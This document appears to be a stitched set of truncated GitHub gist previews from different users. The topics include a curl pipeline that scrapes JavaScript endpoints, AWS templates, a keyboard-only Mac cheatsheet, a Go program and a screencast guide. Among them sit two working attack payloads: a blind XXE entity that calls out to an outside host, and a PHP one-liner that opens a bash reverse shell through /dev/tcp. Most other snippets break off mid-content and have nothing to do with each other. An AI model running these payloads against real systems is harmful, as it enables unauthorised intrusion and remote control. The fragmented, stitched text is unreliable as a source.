gwen001

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

tmaslen

{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Description": "AWS CloudFormation sample template that contains a single Lambda function behind an API Gateway",

  "Resources": {

    "GreetingLambda": {
      "Type": "AWS::Lambda::Function",
      "Properties": {

lornajane

Keyboard-only Mac Cheatsheet

Hi, I'm Lorna and I don't use a mouse. I have had RSI issues since a bad workstation setup at work in 2006. I've tried a number of extra hardware modifications but what works best for me is to use the keyboard and only the keyboard, so I'm in a good position and never reaching for anything else (except my coffee cup!). I rather unwisely took a job which required me to use a mac (I've been a linux user until now and also had the ability to choose my tools carefully) so here is my cheatsheet of the apps, tricks and keyboard shortcuts I'm using, mostly for my own reference. Since keyboard-only use is also great for productivity, you may also find some of these ideas useful, in which case at least something good has come of this :)

Apps List

There's more detail on a few of these apps but here is a quick overview of the tools I've installed and found helpful

Tool	Link	Comments

montanaflynn

package main

import (
	"fmt"
	"math/rand"
	"os"
	"time"
)

// Card holds the card suits and types in the deck

mlafeldt

First of all, install Homebrew itself.

As the tap is a private Git repo, you need to generate a GitHub token with repo scope and then add this token to your ~/.netrc file like this:

machine github.com
  login <your GitHub user>
  password <your GitHub token>

rantav

Sends Cloudwatch Event notifications to Slack

What is this?

AWS have released a new featue called CloudWatch Events, which lets you configure events fired by cloudwatch and direct them to SNS, Lambda functions, etc. Here's the blog post

Motivational image:

Here's the motivational image:

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

rshipp

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

dergachev

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application: